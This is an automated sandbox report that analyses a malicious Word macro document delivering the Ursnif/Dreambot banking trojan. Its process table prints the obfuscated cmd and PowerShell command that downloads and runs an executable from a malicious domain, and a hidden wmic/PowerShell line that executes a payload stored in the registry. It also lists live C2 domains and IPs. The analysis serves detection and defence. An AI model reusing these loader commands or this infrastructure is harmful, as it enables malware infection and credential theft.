analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Service_1st.doc

Full analysis: https://app.any.run/tasks/aeab107b-ed09-4633-8a2a-c7fcf7745a9e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 18:10:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
gozi
ursnif
opendir
loader
trojan
dreambot
evasion
stealer
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Profit-focused leading edge frame, Subject: Maryland Lucas, Author: 1-440-621-7078 x377, Comments: Face to face optimizing hub, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Nov 14 08:13:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

38E9FF652827CF6AFB33F688EE2D621E

SHA1:

5703B51EE832539CD0169DF680001F47C9E184A3

SHA256:

0EB381D8F60F8A98129111EC108157A83239A3AAF4872CCF2AC862839800400F

SSDEEP:

1536:F9uI8jJbfeXbwyvscutAxc8rluCE9/yW5eDt3m6AZcndS/sllpjZe52SE6:fsJ6Xdkc1RrE5SAZ/UZEE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1000)
    • Executes PowerShell scripts

      • cMd.EXE (PID: 4080)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1000)
    • Application was dropped or rewritten from another process

      • 739055c.exe (PID: 1368)
      • 6303562.exe (PID: 2280)
    • URSNIF was detected

      • powershell.exe (PID: 3964)
      • iexplore.exe (PID: 2192)
      • iexplore.exe (PID: 3224)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3964)
    • Connects to CnC server

      • iexplore.exe (PID: 2192)
      • iexplore.exe (PID: 3224)
    • Application was injected by another process

      • explorer.exe (PID: 1604)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 4008)
    • Runs injected code in another process

      • powershell.exe (PID: 3312)
    • Stealing of credential data

      • explorer.exe (PID: 1604)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 1604)
  • SUSPICIOUS

    • Creates files in the user directory

      • explorer.exe (PID: 1604)
      • powershell.exe (PID: 3964)
      • powershell.exe (PID: 3312)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 1604)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3964)
      • explorer.exe (PID: 1604)
    • Uses WMIC.EXE to create a new process

      • explorer.exe (PID: 1604)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 1604)
    • Checks for external IP

      • nslookup.exe (PID: 1464)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1000)
      • iexplore.exe (PID: 2192)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1000)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 1604)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2192)
      • iexplore.exe (PID: 3224)
    • Changes internet zones settings

      • iexplore.exe (PID: 3192)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2192)
      • iexplore.exe (PID: 3224)
    • Application launched itself

      • iexplore.exe (PID: 3192)
    • Reads settings of System Certificates

      • explorer.exe (PID: 1604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Profit-focused leading edge frame
Subject: Maryland Lucas
Author: 1-440-621-7078 x377
Keywords: -
Comments: Face to face optimizing hub
Template: Normal
LastModifiedBy: Пользователь Windows
RevisionNumber: 10
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:04:19 18:59:00
ModifyDate: 2018:11:14 08:13:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: Alexandra Shanahan II
Company: Bins Group Roosevelt Crist
Bytes: 103936
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
63
Monitored processes
21
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start inject drop and start winword.exe no specs cmd.exe no specs #URSNIF powershell.exe 739055c.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe wmic.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs ping.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs makecab.exe no specs 6303562.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1000"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Service_1st.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4080cMd.EXE /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^k^A^b^w^B^r^A^H^U^A^b^g^B^v^A^H^M^A^a^A^B^p^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^k^A^c^g^B^p^A^G^c^A^M^Q^A^x^A^C^4^A^d^w^B^v^A^H^M^A^I^g^A^s^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^I^A^A^r^A^C^A^A^J^w^B^c^A^D^c^A^M^w^A^5^A^D^A^A^N^Q^A^1^A^G^M^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^M^w^A^5^A^D^A^A^N^Q^A^1^A^G^M^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^A^=^=C:\Windows\system32\cMd.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3964poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBvAHkAbwBrAHUAbgBvAHMAaABpAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AGkAcgBpAGcAMQAxAC4AdwBvAHMAIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADcAMwA5ADAANQA1AGMALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAMwA5ADAANQA1AGMALgBlAHgAZQAnADsAIABFAHgAaQB0AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1368"C:\Users\admin\AppData\Roaming\739055c.exe" C:\Users\admin\AppData\Roaming\739055c.exepowershell.exe
User:
admin
Company:
SportsSignup Radio
Integrity Level:
MEDIUM
Description:
Togetherpound
Exit code:
0
3192"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2192"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3192 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3224"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3192 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1432"C:\Windows\system32\wbem\wmic.exe" /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))"C:\Windows\system32\wbem\wmic.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3312powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
340"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\3uvjfbcs.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
5 042
Read events
4 469
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
12
Text files
17
Unknown types
10

Dropped files

PID
Process
Filename
Type
1000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B03.tmp.cvr
MD5:
SHA256:
1000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF10F7049A664B4640.TMP
MD5:
SHA256:
1000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B9C953B8-C77D-4C1B-A360-76E153FBD810}.tmp
MD5:
SHA256:
1000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2844D5C5-7570-4B15-ACD9-2AD0BECE68D1}.tmp
MD5:
SHA256:
3964powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7TTDQEL24HDZU7E969G1.temp
MD5:
SHA256:
3192iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3192iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3192iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2CD37C38FAFF41E9.TMP
MD5:
SHA256:
3192iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFE0E5A84D7A2BF067.TMP
MD5:
SHA256:
3192iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{D8AA4938-E838-11E8-BFAB-5254004AAD11}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
12
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3964
powershell.exe
GET
200
46.17.46.97:80
http://oyokunoshi.com/YER/pelim.php?l=irig11.wos
RU
executable
488 Kb
malicious
2192
iexplore.exe
GET
200
46.17.46.173:80
http://cjwefomatt.com/images/tz2T2cpH13/hoSMohryMG_2Fqzy9/b2fR3qccjjiD/72ZYT_2BTS_/2BGIX6_2FPgR0a/e4aiX3OvZXFHPqsAJBVJS/Bc63GGxT26VcHQjk/zX7q1lVFr8qeXVz/SyBYlPnU8GhgvEYDAU/XxIF4eppv/Ge_2Fo2dPhbrHD9CFc9D/ctURqr_2BWqM4ir/wFXlQ.avi
RU
text
158 Kb
malicious
3192
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3192
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3224
iexplore.exe
GET
200
46.17.46.173:80
http://cjwefomatt.com/images/vrR1jCxVVQw6Fmat0YFB/pJU1BL3U4ndFBs9RYJ3/ExDKemqFltVHB77aGaCzr5/WYN8l6FXsT3R7/vkroxI6J/9m_2Fu77jCgBEdMmKsSJNdE/RZpLzpOCIq/etO1fiLI7BTn5tzia/O9MaaBuRmuTLeLdtMG/_2BN.avi
RU
text
1.74 Kb
malicious
1604
explorer.exe
GET
200
176.32.33.246:80
http://176.32.33.246/qwyhbeasdqwd.rar
RU
binary
127 Kb
suspicious
3192
iexplore.exe
GET
200
46.17.46.173:80
http://cjwefomatt.com/favicon.ico
RU
image
5.30 Kb
malicious
1604
explorer.exe
GET
200
2.16.186.89:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
54.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3224
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
2192
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
3964
powershell.exe
46.17.46.97:80
oyokunoshi.com
LLC Baxet
RU
suspicious
3192
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3192
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
1464
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
1604
explorer.exe
95.181.198.231:443
wifilhefonle.com
Dataline Ltd
RU
malicious
1604
explorer.exe
176.32.33.246:80
LLC Baxet
RU
suspicious
1604
explorer.exe
2.16.186.89:80
www.download.windowsupdate.com
Akamai International B.V.
whitelisted

DNS requests

Domain
IP
Reputation
oyokunoshi.com
  • 46.17.46.97
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
cjwefomatt.com
  • 46.17.46.173
malicious
resolver1.opendns.com
  • 208.67.222.222
shared
myip.opendns.com
  • 136.0.0.157
shared
wifilhefonle.com
  • 95.181.198.231
malicious
www.download.windowsupdate.com
  • 2.16.186.89
  • 2.16.186.56
whitelisted

Threats

PID
Process
Class
Message
3964
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3964
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3964
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2192
iexplore.exe
A Network Trojan was detected
SC SPYWARE TrojanSpy:Win32/Ursnif variant
2192
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3224
iexplore.exe
A Network Trojan was detected
SC SPYWARE TrojanSpy:Win32/Ursnif variant
3224
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
1464
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
1464
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
1604
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:Win32/Ursnif malicious SSL Certificate Detected
7 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144